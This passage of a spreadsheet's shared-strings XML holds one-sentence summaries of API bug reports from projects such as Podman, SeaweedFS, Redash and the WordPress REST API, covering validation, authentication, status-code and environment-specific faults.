    <t>Error messages from the shipping API are not displayed in the frontend due to incorrect handling of the Success property in the specific nopCommerce environment.</t>
  </si>
  <si>
    <t>Address is saved even when the required country field is missing indicating a failure in request payload validation.</t>
  </si>
  <si>
    <t>The issue is caused by exceeding the default RequestFormLimits for the number of form fields submitted in a single request.</t>
  </si>
  <si>
    <t>Submitting an address without selecting a required state fails to show a validation error and instead results in a 404 page.</t>
  </si>
  <si>
    <t>Shopping cart and order placement APIs fail to validate that product attribute values still exist leading to acceptance of invalid payloads.</t>
  </si>
  <si>
    <t>Marking CustomProperties as JsonIgnore changes API behavior and breaks the ability to extend models and pass data to JavaScript.</t>
  </si>
  <si>
    <t>The import process selects the state code without filtering by the specified country leading to incorrect query parameter handling.</t>
  </si>
  <si>
    <t>AJAX catalog requests using GET instead of POST allow direct access and cause unexpected page rendering.</t>
  </si>
  <si>
    <t>This issue is caused by attempting to set HTTP headers after the response has started which is a classic middleware and response pipeline integration problem in ASP.NET Core.</t>
  </si>
  <si>
    <t>Error messages are not displayed when picture upload fails indicating an issue with file upload error handling.</t>
  </si>
  <si>
    <t>The API fails because the POSTed JSON parameters are not correctly bound resulting in a null value and a subsequent type conversion error.</t>
  </si>
  <si>
    <t>Media Field configured as "Attached" throws a file handling error when attempting to upload.</t>
  </si>
  <si>
    <t>The user reports that POST requests to the Lucene Query API return null items likely due to issues with the request body format or schema validation.</t>
  </si>
  <si>
    <t>Saving a content item with a taxonomy field in tags display returns a 400 error indicating a payload or schema validation issue during POST.</t>
  </si>
  <si>
    <t>ImpliedBy permissions are not honored during token-based access resulting in unexpected 403 Forbidden responses.</t>
  </si>
  <si>
    <t>API request with application/json Content-Type is rejected with an "Incorrect Content Type" error when validating reCaptcha.</t>
  </si>
  <si>
    <t>Access token retrieval fails when using email instead of username indicating an authentication endpoint issue.</t>
  </si>
  <si>
    <t>An InvalidOperationException occurs because the responseWrite scripting method writes to the response before the MVC pipeline finishes, causing a conflict in middleware response handling.</t>
  </si>
  <si>
    <t>The API endpoints in the OpenID configuration do not reflect the configured Authority/Issuer when it differs from the current host indicating a configuration-dependent behavior bug.</t>
  </si>
  <si>
    <t>Admin user with valid OAuth2 token is unable to access API endpoints and receives 401 unauthorized despite successful authentication.</t>
  </si>
  <si>
    <t>Outline manager only lists 20 DigitalOcean droplets indicating a likely issue with query parameters or pagination handling in the API.</t>
  </si>
  <si>
    <t>The API documentation incorrectly specifies the path for creating a key with a specific id which can lead to malformed requests not matching the expected schema.</t>
  </si>
  <si>
    <t>Image uploads to the API fail with a 400 error despite correct file format and size and S3 storage configuration.</t>
  </si>
  <si>
    <t>Issue occurs specifically when multiple images are attached indicating a problem with file upload or attachment handling logic.</t>
  </si>
  <si>
    <t>User cannot log in after updating and changing configuration, indicating a failure in authentication or token endpoint handling.</t>
  </si>
  <si>
    <t>After updating to 0.13 the user cannot log in and receives repeated 401 errors on /api/users/me/ indicating authentication or token validation is failing.</t>
  </si>
  <si>
    <t>Invitation link contains localhost indicating environment-specific misconfiguration in generated URLs.</t>
  </si>
  <si>
    <t>The user receives a "File too large" error when uploading a small file indicating a failure in file upload handling or file size detection.</t>
  </si>
  <si>
    <t>podman stats fails with "Link not found" only when run as root across multiple Linux distributions indicating environment-specific behavior.</t>
  </si>
  <si>
    <t>The API build fails because it cannot find the Dockerfile or Containerfile at the expected file path during the remote build process.</t>
  </si>
  <si>
    <t>The API rejects valid status filter values like removing and restarting resulting in incorrect query parameter handling.</t>
  </si>
  <si>
    <t>Podman API incorrectly returns HTTP 500 instead of the expected HTTP 409 on image conflict which breaks compatibility with Docker API clients.</t>
  </si>
  <si>
    <t>Podman's Docker-compatible REST API fails to start containers from previously pulled images due to a configuration setting that enforces Docker Hub checks which does not occur in Docker.</t>
  </si>
  <si>
    <t>The stats API endpoint returns a 409 error instead of empty stats when querying a container in the created state indicating improper handling of container lifecycle states for resource reporting.</t>
  </si>
  <si>
    <t>Content-Type header is incorrectly set to text/plain instead of application/json only when the container list is empty indicating environment-specific response behavior.</t>
  </si>
  <si>
    <t>The issue occurs when inspecting containers with multiple network interfaces in a specific network namespace configuration resulting in incorrect netmask values in the API response.</t>
  </si>
  <si>
    <t>Podman remote stats API reports incorrect memory limit for containers when using crun runtime indicating a failure in configuring or enforcing container memory limits.</t>
  </si>
  <si>
    <t>Podman system service fails to handle expected TCP connection syntax consistently with podman-remote leading to unexpected behavior in specific configuration scenarios.</t>
  </si>
  <si>
    <t>The API does not support the --userns=auto container runtime setting while the CLI does, leading to inconsistent container namespace configuration.</t>
  </si>
  <si>
    <t>Podman’s REST API emits different image removal events than Docker in the same workflow indicating inconsistent API behavior across environments.</t>
  </si>
  <si>
    <t>RefCount for volumes in the REST API always returns 1 regardless of actual usage indicating incorrect volume usage tracking.</t>
  </si>
  <si>
    <t>The REST API returns an invalid memory limit value for containers instead of the actual configured resource quota.</t>
  </si>
  <si>
    <t>The API does not return the correct 404 status when the fromImage query parameter references a nonexistent image.</t>
  </si>
  <si>
    <t>Podman sends a malformed manifest with an invalid rootfs type field causing schema validation failure and a 500 error from Quay.</t>
  </si>
  <si>
    <t>The issue occurs with Podman's attach API where log message formatting is incorrect before attachment under a specific version and environment configuration.</t>
  </si>
  <si>
    <t>Podman events API does not recognize the Docker-style "die" event filter causing filtered queries to return no results.</t>
  </si>
  <si>
    <t>Test intermittently fails on specific Fedora environment with attach API returning empty content instead of expected output.</t>
  </si>
  <si>
    <t>Podman API server fails to handle Docker-compatible network listing requests during container removal leading to errors when used with Docker clients or CI tools like Gitlab Runner.</t>
  </si>
  <si>
    <t>The API response for the "Titles" field returns a single string instead of an array only when accessed via the podman socket in a specific environment and version.</t>
  </si>
  <si>
    <t>The API fails to handle negative timeout query parameters as allowed by the Docker spec resulting in a parameter parsing error.</t>
  </si>
  <si>
    <t>Podman REST API returns HTTP 500 instead of Docker's HTTP 409 when creating an existing network causing compatibility issues with tools expecting Docker behavior.</t>
  </si>
  <si>
    <t>Podman’s REST API omits the image tag in the /history endpoint response while Docker returns it under the same environment and API version.</t>
  </si>
  <si>
    <t>Podman rejects POST requests with a string value for the pull field that Docker accepts due to stricter schema validation.</t>
  </si>
  <si>
    <t>The API response uses "Id" instead of the expected "id" field causing schema incompatibility with clients expecting the correct field name.</t>
  </si>
  <si>
    <t>Test failures occur intermittently on specific environments indicating a possible race condition or environment-specific issue with pod name reuse.</t>
  </si>
  <si>
    <t>The API fails to return expected images when filtering by label using a specific filter format indicating incorrect handling of query filter parameters.</t>
  </si>
  <si>
    <t>ExecIDs incorrectly report as running long after the process has exited indicating a failure in tracking or updating process state within the container.</t>
  </si>
  <si>
    <t>Podman API fails to respect the tag query parameter in /images/create resulting in incorrect image tagging.</t>
  </si>
  <si>
    <t>API returns HTTP 200 on image push failure only when the private repository rejects the push indicating behavior changes based on environment configuration.</t>
  </si>
  <si>
    <t>The API error message regression occurs after an upgrade to 4.6.0-rc1 indicating a change in behavior tied to a specific version or environment.</t>
  </si>
  <si>
    <t>Unexpected random bytes are received over the podman socket only in the user's specific Arch Linux environment and setup.</t>
  </si>
  <si>
    <t>API returns incorrect status code when attempting to send a kill signal to a stopped container which is a process signal handling issue.</t>
  </si>
  <si>
    <t>The API response does not conform to the expected Docker schema as it lacks a "message" key at the root level causing client compatibility issues.</t>
  </si>
  <si>
    <t>Podman's REST API returns a different and incorrect "Size" value compared to Docker for the same image history endpoint under the same environment.</t>
  </si>
  <si>
    <t>Podman rejects the Docker 25 CLI container create request due to differences in the NetworkingConfig.EndpointsConfig JSON structure leading to invalid config errors.</t>
  </si>
  <si>
    <t>The API rejects the 'platform' query parameter due to invalid multi-arch syntax parsing in the request URL.</t>
  </si>
  <si>
    <t>API returns a JSON unmarshalling error when an invalid query parameter -eo bar is provided to pod top.</t>
  </si>
  <si>
    <t>Error message is missing only when using podman-remote indicating a behavioral difference between local and remote environments.</t>
  </si>
  <si>
    <t>Podman compat API fails to send an immediate HTTP response for streaming endpoints causing client tools like Vector to timeout and stop monitoring.</t>
  </si>
  <si>
    <t>The issue reports that the API returns a list of strings instead of the expected list of lists of strings which is a payload structure mismatch.</t>
  </si>
  <si>
    <t>Issue occurs when running podman info remotely via TCP with systemd socket activation indicating a configuration-specific failure in URL parsing.</t>
  </si>
  <si>
    <t>The stats API endpoint returns a 500 error only in rootless mode with cgroups disabled, indicating the failure is specific to certain environment and configuration settings.</t>
  </si>
  <si>
    <t>API request fails with 500 error because the JSON payload includes -1 for a field defined as uint64 which cannot accept negative values.</t>
  </si>
  <si>
    <t>CreateCommand in container config shows unexpected values when container is created via API rather than CLI indicating environment-specific behavior.</t>
  </si>
  <si>
    <t>In rootless mode the REST API fails to enforce ulimit settings for containers even though the CLI applies them correctly.</t>
  </si>
  <si>
    <t>User does not receive feedback on failed login attempts indicating an issue with the login session handling.</t>
  </si>
  <si>
    <t>Adding an empty query to a dashboard causes a crash indicating improper handling of empty or invalid query parameters.</t>
  </si>
  <si>
    <t>API request fails because the "groups" field receives a string value "admin" instead of an expected integer causing a database error.</t>
  </si>
  <si>
    <t>User is unable to log out when using only Google Apps SSO indicating a problem with session termination and account lifecycle management.</t>
  </si>
  <si>
    <t>The API fails with a 414 error because excessive query parameters are sent in the URL when deleting a visualization with many series.</t>
  </si>
  <si>
    <t>The API throws a TypeError due to attempting to iterate over a NoneType in the dashboard layout processing code.</t>
  </si>
  <si>
    <t>Enabling REDASH_MULTI_ORG configuration causes asset requests to be misinterpreted as organization slugs resulting in runtime errors.</t>
  </si>
  <si>
    <t>The API fails with an AttributeError because the ApiUser object lacks the expected email attribute during runtime.</t>
  </si>
  <si>
    <t>The API accepts the update request and returns success but fails to persist changes to the database indicating a failure in the backend integration between the REST API and the database layer.</t>
  </si>
  <si>
    <t>API key for one query improperly grants access to another query's results indicating a failure in access control enforcement.</t>
  </si>
  <si>
    <t>The login page redirects to a non-existent authentication endpoint causing SSO login to fail.</t>
  </si>
  <si>
    <t>The API returns JSON with a NaN value for a field that is defined as a string type causing JSON.parse to fail in the browser.</t>
  </si>
  <si>
    <t>The search endpoint returns an object instead of the expected array causing query search and alert creation to fail.</t>
  </si>
  <si>
    <t>The error is caused by a code change where a dict is accessed as an object leading to an AttributeError at runtime.</t>
  </si>
  <si>
    <t>The issue occurs specifically when using Athena with the Glue catalog configuration and does not appear to be related to IAM permissions or general Redash functionality.</t>
  </si>
  <si>
    <t>API returns 500 instead of 400 when invalid query parameters are provided causing improper error handling for client input.</t>
  </si>
  <si>
    <t>A 403 error occurs when adding a query-based dropdown parameter to a saved query indicating an authorization or access control issue with the API endpoint.</t>
  </si>
  <si>
    <t>User creation fails because the profile_image_url field exceeds the database column's maximum length constraint indicating a schema validation issue.</t>
  </si>
  <si>
    <t>The admin UI always shows "n/a" for the "Started" value because the backend no longer sets this value after architectural changes, causing a regression in the displayed data.</t>
  </si>
  <si>
    <t>The Guess Your Location tool returns restrooms from the opposite side of the country instead of nearby locations indicating incorrect handling of location-based query parameters.</t>
  </si>
  <si>
    <t>The issue reports incorrect country name translation returned by the API when queried for Morocco in Arabic.</t>
  </si>
  <si>
    <t>The API returns incorrect language data for Aruba and Curaçao indicating a misconfiguration of country-language mapping.</t>
  </si>
  <si>
    <t>The API response for Chad's borders omits Sudan indicating an error in how border data is queried or filtered for this country.</t>
  </si>
  <si>
    <t>The API returns incorrect data for the capital field when queried for Vatican City indicating an error in handling or returning search parameters.</t>
  </si>
  <si>
    <t>The API response for Antarctica omits expected currencies and languages indicating incomplete or inconsistent configuration for this specific region.</t>
  </si>
  <si>
    <t>The API returns an incorrect list of time zones for France instead of the expected single value indicating a configuration or data mapping issue.</t>
  </si>
  <si>
    <t>The API endpoint for EU regional bloc returns incorrect results by including Faroe Islands which are not part of the EU.</t>
  </si>
  <si>
    <t>The API returns an incorrect country name for a valid country code indicating a problem with how country data is retrieved or mapped based on query parameters.</t>
  </si>
  <si>
    <t>The API returns an incorrect timezone for Tbilisi Georgia indicating a misconfiguration of environment-specific data.</t>
  </si>
  <si>
    <t>The API returns inconsistent bordering country data for Suriname and Brazil indicating an error in how query results are constructed or filtered.</t>
  </si>
  <si>
    <t>The API incorrectly includes the UK as an EU country indicating an error in how query or filter parameters determine EU membership.</t>
  </si>
  <si>
    <t>The API returns an incorrect native name for Luxembourg indicating a problem with how country name data is filtered or selected for the response.</t>
  </si>
  <si>
    <t>The API returns incorrect border country codes for Kuwait indicating an error in how country border data is queried or filtered.</t>
  </si>
  <si>
    <t>The issue reports that the API returns the outdated capital name Kiev instead of the correct Kyiv indicating incorrect handling or mapping of country data in response to query parameters.</t>
  </si>
  <si>
    <t>The API returns inconsistent border country data for China and Nepal indicating an error in how query results are filtered or constructed.</t>
  </si>
  <si>
    <t>The API returns an outdated country name for Eswatini which leads to incorrect query and search results for users.</t>
  </si>
  <si>
    <t>The API returns an incorrect content-type header after a file upload operation instead of the expected application/json.</t>
  </si>
  <si>
    <t>Assigning a file id with a collection does not create the expected collection volume files or allow access as intended.</t>
  </si>
  <si>
    <t>redirectOnRead returns a localhost URL in the Location header instead of the expected hostname indicating a configuration-dependent redirect issue.</t>
  </si>
  <si>
    <t>User reports that after upgrading the API version image files uploaded via POST are not displayed correctly in the browser indicating a file access or HTTP header issue.</t>
  </si>
  <si>
    <t>Repeated read errors and 404s for specific file IDs indicate file or volume access failures on the volume server.</t>
  </si>
  <si>
    <t>Re-uploading a file after its TTL expiry without a TTL option results in persistent 404 errors indicating a failure in file access or overwrite logic.</t>
  </si>
  <si>
    <t>Whitelist checks are bypassed when proxying to the leader due to incorrect middleware order in the REST API handler chain.</t>
  </si>
  <si>
    <t>Uploading zero-size non-text files fails with a disk write error while zero-size text files succeed indicating inconsistent file upload handling.</t>
  </si>
  <si>
    <t>Benchmark command returns 404 on /dir/assign despite the endpoint working via curl and browser indicating an environment or configuration-specific issue.</t>
  </si>
  <si>
    <t>Cluster join fails due to improper redirect handling during multi-master setup causing split leadership.</t>
  </si>
  <si>
    <t>TTL struct fields are not exported causing JSON marshal to produce empty TTL info which affects the API response schema.</t>
  </si>
  <si>
    <t>API fails to allocate all requested volumes and reports inconsistent free volume counts indicating issues with resource quota enforcement.</t>
  </si>
  <si>
    <t>File update attempts to an existing file ID fail with HTTP errors and replica write failures during upload.</t>
  </si>
  <si>
    <t>The S3 list_buckets API returns internal errors only in the SeaweedFS S3 gateway setup while other operations and tools like weed shell work, indicating an environment-specific configuration or integration issue.</t>
  </si>
  <si>
    <t>Deleting a non-existing file returns a 500 error instead of the expected 404 indicating incorrect file operation error handling.</t>
  </si>
  <si>
    <t>The filer does not pass query parameters like width to the volume server resulting in image resizing not working as expected.</t>
  </si>
  <si>
    <t>Filer returns 500 error stating volume not found even though the volume exists on the server and is accessible after restarting the filer.</t>
  </si>
  <si>
    <t>The S3 gateway fails to filter objects by arbitrary prefix in ListObjects requests causing all objects to be returned regardless of the prefix parameter.</t>
  </si>
  <si>
    <t>DELETE request to a nonexistent file returns 404 instead of the S3-specified 204 causing file operation compatibility issues.</t>
  </si>
  <si>
    <t>User receives "wrong jwt" error and cannot authenticate with the provided JWT token despite correct configuration and time settings.</t>
  </si>
  <si>
    <t>The issue involves file upload failures and HTTP 500 errors due to problems assigning file IDs and parsing master addresses during S3 API operations.</t>
  </si>
  <si>
    <t>S3 API fails to upload files with '%' in the filename even though such names are valid and upload works via other methods.</t>
  </si>
  <si>
    <t>Copying a directory via S3 API returns a fatal error instead of a proper 404 when the key does not exist indicating a file access handling issue.</t>
  </si>
  <si>
    <t>The API returns an incorrect response when handling the "?acl" query parameter on a non-existent bucket instead of the expected error or policy document.</t>
  </si>
  <si>
    <t>Error occurs due to wsrep_max_ws_rows being exceeded in the underlying Galera cluster configuration during bulk delete operations.</t>
  </si>
  <si>
    <t>The API ignores ContentDisposition and ResponseContentDisposition parameters resulting in incorrect response headers.</t>
  </si>
  <si>
    <t>HeadBucketHandler returns 403 Access Denied for non-super admin users indicating a bucket-level permission or access control misconfiguration.</t>
  </si>
  <si>
    <t>User receives 403 Access Denied errors indicating authentication or authorization failure when performing write actions with valid credentials.</t>
  </si>
  <si>
    <t>Copying a folder using "X-Amz-Copy-Source" incorrectly creates a file with HTML content instead of returning a 40x error.</t>
  </si>
  <si>
    <t>Error message indicates failure to write to local disk during file upload resulting in HTTP 500 and specific file operation error.</t>
  </si>
  <si>
    <t>Filer does not correctly return HTTP 304 for file access when If-Modified-Since matches Last-Modified header.</t>
  </si>
  <si>
    <t>Uploads to paths beginning with /etc are consistently truncated to 4MB indicating a file upload handling issue specific to certain path prefixes.</t>
  </si>
  <si>
    <t>The master server returns 404 Not Found when accessing files on a read-only volume indicating a failure in file access operations after the volume state changes.</t>
  </si>
  <si>
    <t>API returns 500 Internal Server Error instead of 409 Conflict when attempting to create a directory that already exists.</t>
  </si>
  <si>
    <t>The API response is malformed and missing the required VersionConfiguration node causing clients to fail parsing the response.</t>
  </si>
  <si>
    <t>Timeouts occur during /dir/assign requests specifically when the master initiates volume growth indicating issues with cluster coordination during dynamic volume assignment.</t>
  </si>
  <si>
    <t>When the webdav service stops an existing file returns a 404 error indicating a file access issue rather than a true file absence.</t>
  </si>
  <si>
    <t>The issue is caused by missing S3 authentication setup resulting in a misleading error message instead of a clear authentication failure message.</t>
  </si>
  <si>
    <t>The API allows creation of a bucket with an invalid name which leads to internal errors and an unremovable resource.</t>
  </si>
  <si>
    <t>SeaweedFS does not support the x-id query parameter emitted by AWS SDKs causing issues with presigned requests.</t>
  </si>
  <si>
    <t>Filtering customers by name or email in the admin tool returns an empty list indicating a problem with query or search parameter handling.</t>
  </si>
  <si>
    <t>The API allows negative product quantities in the cart indicating a lack of input validation for the quantity field.</t>
  </si>
  <si>
    <t>The API returns a captcha required error during phone verification which is likely triggered by environment or external service configuration.</t>
  </si>
  <si>
    <t>After account deregistration and re-registration the user cannot send messages to a group they were previously a member of indicating an issue with account lifecycle handling.</t>
  </si>
  <si>
    <t>The API rejects the request due to a missing required device name parameter despite documentation stating no parameters are needed.</t>
  </si>
  <si>
    <t>Jackson fails to serialize JsonGroupInfo due to missing properties or annotations indicating a Java serialization or dependency configuration issue.</t>
  </si>
  <si>
    <t>The scheduler uses a hardcoded port 8080 instead of the configured port causing failures when the API is run on a different port.</t>
  </si>
  <si>
    <t>The issue reports a mismatch between actual HTTP status codes returned by the API and those documented in Swagger, which can cause confusion or errors depending on the client environment and expectations.</t>
  </si>
  <si>
    <t>The /v1/groups/{number}/{groupid}/block endpoint does not function as expected specifically when used on a linked device in JSON-RPC mode, indicating environment-dependent behavior.</t>
  </si>
  <si>
    <t>The API returns a Go struct unmarshalling error when accessed via Docker container indicating environment-specific deserialization issues.</t>
  </si>
  <si>
    <t>Link device API fails specifically when running signal-cli in a docker container indicating an environment-related issue.</t>
  </si>
  <si>
    <t>Username update works for avatar but not for name specifically when using the API in JSON-RPC mode within a Docker container.</t>
  </si>
  <si>
    <t>User is unable to deregister a flawed phone number via the REST API due to improper account lifecycle handling for unregistered numbers.</t>
  </si>
  <si>
    <t>The /v1/search endpoint fails when multiple accounts exist because it does not support specifying the account as a parameter.</t>
  </si>
  <si>
    <t>Group deletion via the REST API in a containerized environment does not remove the group despite a successful response indicating a failure in group handling.</t>
  </si>
  <si>
    <t>The API fails to provide actionable error details in its HTTP response when running in the Docker container, making it difficult to diagnose phone number specific issues.</t>
  </si>
  <si>
    <t>Setting group_link to enabled in the POST payload does not have the intended effect indicating the API is not correctly processing or validating this field.</t>
  </si>
  <si>
    <t>The error message "Unable to parse entity" and HTTP 400 response indicate the API is rejecting the POST request due to a problem with the JSON payload or its schema.</t>
  </si>
  <si>
    <t>User reports 404 errors for specific endpoints when running the API in a Docker container environment indicating possible environment-specific configuration or routing issues.</t>
  </si>
  <si>
    <t>Issue occurs only when running the Docker container in JSON-RPC mode on arm64 with the latest dev image and specific configuration.</t>
  </si>
  <si>
    <t>Concurrent map writes cause fatal errors specifically when multiple clients connect in JSON-RPC mode within the Docker container environment.</t>
  </si>
  <si>
    <t>The API rejects the request because the recipient UUID is not accepted as a valid username format which triggers a schema validation error.</t>
  </si>
  <si>
    <t>Nested styled text in the message payload is not processed correctly resulting in loss of combined formatting despite valid JSON input.</t>
  </si>
  <si>
    <t>The notify_self query parameter is not handled consistently for direct messages versus group chats resulting in unexpected behavior.</t>
  </si>
  <si>
    <t>Group description is missing from API responses only in the Docker container environment despite being present in the official documentation.</t>
  </si>
  <si>
    <t>The issue is about preventing the customer field from being set via POST data and enforcing it from the URL which is a schema and payload validation concern.</t>
  </si>
  <si>
    <t>The issue requests that the subscription serializer expose the subscription_id indicating a missing field in the API response schema.</t>
  </si>
  <si>
    <t>Editing a subscription with a name containing the character "ä" causes an error indicating the API does not properly handle or validate non-ASCII characters in input payloads.</t>
  </si>
  <si>
    <t>Deleting proformas intermittently returns server error 500 indicating a backend runtime or dependency failure during the delete operation.</t>
  </si>
  <si>
    <t>API allows access to a payment method not linked to the specified customer indicating a failure in enforcing database-level user-resource associations.</t>
  </si>
  <si>
    <t>The API rejects the request because the 'state' field is missing or invalid which is a schema validation issue.</t>
  </si>
  <si>
    <t>The issue requests that the GET payment_methods endpoint should return an expanded payment_processor which relates to how query results are structured and returned.</t>
  </si>
  <si>
    <t>Single resource fetch returns an array instead of an object and incorrect endpoint URL causes errors.</t>
  </si>
  <si>
    <t>The issue highlights inconsistent schema definitions for the status field between two endpoints which can lead to validation errors or confusion in API usage.</t>
  </si>
  <si>
    <t>API returns a 400 Bad Request error code instead of the documented 404 Not Found when a non-existent ID is requested indicating incorrect error handling for invalid resource identifiers.</t>
  </si>
  <si>
    <t>API returns "Cannot read property 'map' of undefined" when posting a valid query for upcoming launches indicating a failure in handling query or search parameters.</t>
  </si>
  <si>
    <t>Populating the crew field in the launches query no longer returns the expected data and only provides IDs despite correct query syntax.</t>
  </si>
  <si>
    <t>The error occurs when using the "populate" query option in POST requests to the launches/query endpoint indicating a problem with handling specific query parameters.</t>
  </si>
  <si>
    <t>The POST /pets endpoint requires the client to provide an 'id' field instead of auto-generating it which is a schema and payload validation issue.</t>
  </si>
  <si>
    <t>self href URLs in API responses are missing the /api prefix due to incorrect environment-specific base path configuration.</t>
  </si>
  <si>
    <t>The API rejects the request due to missing required fields id and type.id in the petDto payload.</t>
  </si>
  <si>
    <t>POST request to the documented create pet endpoint returns a 501 error indicating the endpoint is not implemented in the REST API.</t>
  </si>
  <si>
    <t>The specialties endpoint returns an incorrect Location header value which violates RESTful response schema expectations.</t>
  </si>
  <si>
    <t>API fails to return 404 for non-existent ownerId in POST request and instead returns a 400 with a database integrity error indicating improper validation of resource existence.</t>
  </si>
  <si>
    <t>The API returns a 400 error due to missing equals and hashCode methods in entity classes which causes object comparison to fail in the current environment.</t>
  </si>
  <si>
    <t>Basic authentication fails with 401 due to missing PasswordEncoder mapping for user credentials.</t>
  </si>
  <si>
    <t>The OpenAPI spec defines a PUT endpoint for updating a pet but the controller lacks its implementation causing the API to return HTTP 501 Not Implemented.</t>
  </si>
  <si>
    <t>The filter fails when the text field contains an ampersand because the query parameter is incorrectly parsed and truncated at the "&amp;" symbol.</t>
  </si>
  <si>
    <t>The API returns a misleading error when pagination query parameters are provided at the root level instead of within the expected pagination object.</t>
  </si>
  <si>
    <t>The error message indicates that the relation "products_by_region_ep_product_links" does not exist in the database even though the table is present, pointing to a database access or schema recognition issue.</t>
  </si>
  <si>
    <t>Forgot password endpoint returns success for non-existent or blocked users indicating a flaw in account-related workflow handling.</t>
  </si>
  <si>
    <t>useFetchClient fails to handle non-JSON file downloads like zip files resulting in empty or incorrect file responses.</t>
  </si>
  <si>
    <t>The function always sees current_role as postgres due to SECURITY DEFINER causing user access checks to fail as described in the documentation.</t>
  </si>
  <si>
    <t>ForwardAuth middleware incorrectly rewrites the Location header instead of passing the original value from the auth server.</t>
  </si>
  <si>
    <t>Monitor list is returned to the client even when the two-step authentication token is not provided after correct username and password are entered.</t>
  </si>
  <si>
    <t>Issue is caused by small discrepancies in system time between environments leading to race conditions and duplicate notifications.</t>
  </si>
  <si>
    <t>Port field is stored as an empty string instead of NULL or INTEGER causing schema validation errors in strict type-checked APIs.</t>
  </si>
  <si>
    <t>The API accepted an invalid accepted_statuscodes payload without validation causing a server crash instead of rejecting the malformed input.</t>
  </si>
  <si>
    <t>The CLI command displays a misleading error message due to improper handling of HTTP 500 responses from the REST API.</t>
  </si>
  <si>
    <t>Route parameter substitution in headers works on Now server but fails in now-dev indicating an environment-specific inconsistency.</t>
  </si>
  <si>
    <t>now dev does not respect HTTP methods defined in the routes configuration leading to incorrect API behavior in the development environment.</t>
  </si>
  <si>
    <t>Query parameter name is passed as the string "undefined" when not provided in the route resulting in unexpected query string behavior.</t>
  </si>
  <si>
    <t>The issue is about displaying an unhelpful error when the authentication token is expired indicating a problem with token-based access handling.</t>
  </si>
  <si>
    <t>The serverless Node.js API fails to render errors and instead hangs indefinitely indicating a problem in error handling middleware integration.</t>
  </si>
  <si>
    <t>UnicodeEncodeError occurs because the deployed Python environment defaults to latin-1 encoding instead of utf-8 when handling non-ASCII payloads.</t>
  </si>
  <si>
    <t>Dynamic route rewrites work in production but return 404 errors when using now dev indicating environment-specific behavior differences.</t>
  </si>
  <si>
    <t>The serverless function fails when the URL contains special characters in query parameters indicating improper handling of query string encoding.</t>
  </si>
  <si>
    <t>The issue is caused by the Vercel CLI incorrectly reconstructing query parameters in proxied URLs resulting in malformed queries that break Vite's expected behavior.</t>
  </si>
  <si>
    <t>The ASGI application crashes only when deployed on Vercel Serverless due to how incoming headers are parsed in that environment.</t>
  </si>
  <si>
    <t>The PHP notice occurs only when there are no created or published posts and a custom post type is requested indicating environment-specific behavior.</t>
  </si>
  <si>
    <t>WP_JSON_CustomPostType does not accept JSON input for editing or creating posts which is a payload handling issue.</t>
  </si>
  <si>
    <t>Raw data sent to the endpoint is ignored causing the endpoint to break due to improper handling of request payloads.</t>
  </si>
  <si>
    <t>The revisions endpoint returns null despite existing revisions indicating a possible environment or configuration-specific issue.</t>
  </si>
  <si>
    <t>A fatal error occurs when accessing a non-existent comment due to a null object dereference in the API code.</t>
  </si>
  <si>
    <t>The issue is about required parameter checks being performed at the wrong stage of the user API workflow which is a schema validation logic error.</t>
  </si>
  <si>
    <t>The media endpoint response is missing the alternative text field which indicates an incomplete or incorrect response schema.</t>
  </si>
  <si>
    <t>The API reads the post parent value from the wrong key in the payload causing incorrect field mapping.</t>
  </si>
  <si>
    <t>Draft posts return invalid date values instead of null which violates expected schema for date fields.</t>
  </si>
  <si>
    <t>User email addresses are exposed to all users due to incorrect access control on user data in the API.</t>
  </si>
  <si>
    <t>The API returns inconsistent data types for the same field which complicates client deserialization logic.</t>
  </si>
  <si>
    <t>The /posts endpoint does not return expected custom fields when the context=edit query parameter is used.</t>
  </si>
  <si>
    <t>API fails to find taxonomies with dash in slug indicating a bug triggered by specific configuration of taxonomy names.</t>
  </si>
  <si>
    <t>A fatal error occurs due to a null object when retrieving a child comment indicating a runtime handling issue in the API code.</t>
  </si>
  <si>
    <t>The issue concerns inconsistent and overwritten response fields in the API payload which can lead to confusion or schema violations for clients consuming the API.</t>
  </si>
  <si>
    <t>The fatal error indicates a type mismatch in PHP code when handling the response object during a post update.</t>
  </si>
  <si>
    <t>API output property names break compatibility with standard WordPress functions when used in another WordPress site environment.</t>
  </si>
  <si>
    <t>The issue is about not passing the correct context parameter in the API response which affects the returned data.</t>
  </si>
  <si>
    <t>The API incorrectly returns an error for a valid query with no results instead of an empty list indicating improper handling of query parameters with empty results.</t>
  </si>
  <si>
    <t>The issue concerns API responses not matching the declared schema and returning malformed objects instead of proper errors.</t>
  </si>
  <si>
    <t>The issue concerns how multiple invalid request arguments are reported and programmatically accessed during parameter validation.</t>
  </si>
  <si>
    <t>The API returns HTML entities in JSON responses due to WordPress storage format which is not appropriate for JSON and leads to incorrect data representation.</t>
  </si>
  <si>
    <t>The client JavaScript is broken because it references the wrong API URL which is a configuration issue affecting API behavior.</t>
  </si>
  <si>
    <t>The REST API returns term IDs that do not match those shown in WP-Admin indicating inconsistent behavior between API and admin interface under the current environment or configuration.</t>
  </si>
  <si>
    <t>Updating only the status field via PUT unexpectedly deletes other fields indicating improper handling or validation of partial update payloads.</t>
  </si>
  <si>
    <t>get_params and get_param unexpectedly include the route URL as a parameter which is not registered or expected in the endpoint.</t>
  </si>
  <si>
    <t>The API incorrectly allows fetching a category term from the tag endpoint indicating improper handling of route and query parameters.</t>
  </si>
  <si>
    <t>The media endpoint returns data in the browser but an empty array in Postman or Restangular indicating environment or configuration-specific behavior.</t>
  </si>
  <si>
    <t>Paging with per_page greater than 10 returns the same results for all pages indicating incorrect handling of query parameters.</t>
  </si>
  <si>
    <t>Response includes fields not declared in the schema indicating a failure to enforce schema-driven payload validation.</t>
  </si>
  <si>
    <t>API returns different data types for the same field based on user role configuration which leads to inconsistent behavior depending on environment settings.</t>
  </si>
  <si>
    <t>Filtering terms via API can cause inconsistent array versus object output due to unset elements affecting JSON encoding.</t>
  </si>
  <si>
    <t>The issue reports an invalid JSON schema type for "registered_date" which breaks parsers expecting correct schema validation.</t>
  </si>
  <si>
    <t>The API fails to correctly validate boolean query parameters because they are parsed as strings in the URL.</t>
  </si>
  <si>
    <t>The update callback does not handle additional fields in the payload resulting in incomplete updates for attachment resources.</t>
  </si>
  <si>
    <t>The issue arises from inconsistent handling and validation of nested object properties in POST/PUT payloads leading to schema violations and errors.</t>
  </si>
  <si>
    <t>API returns an inconsistent response type when an unsupported query parameter value is provided.</t>
  </si>
  <si>
    <t>The issue is about Zuul returning an incorrect default HTTP status code when routing filters fail which is a middleware response handling problem.</t>
  </si>
  <si>
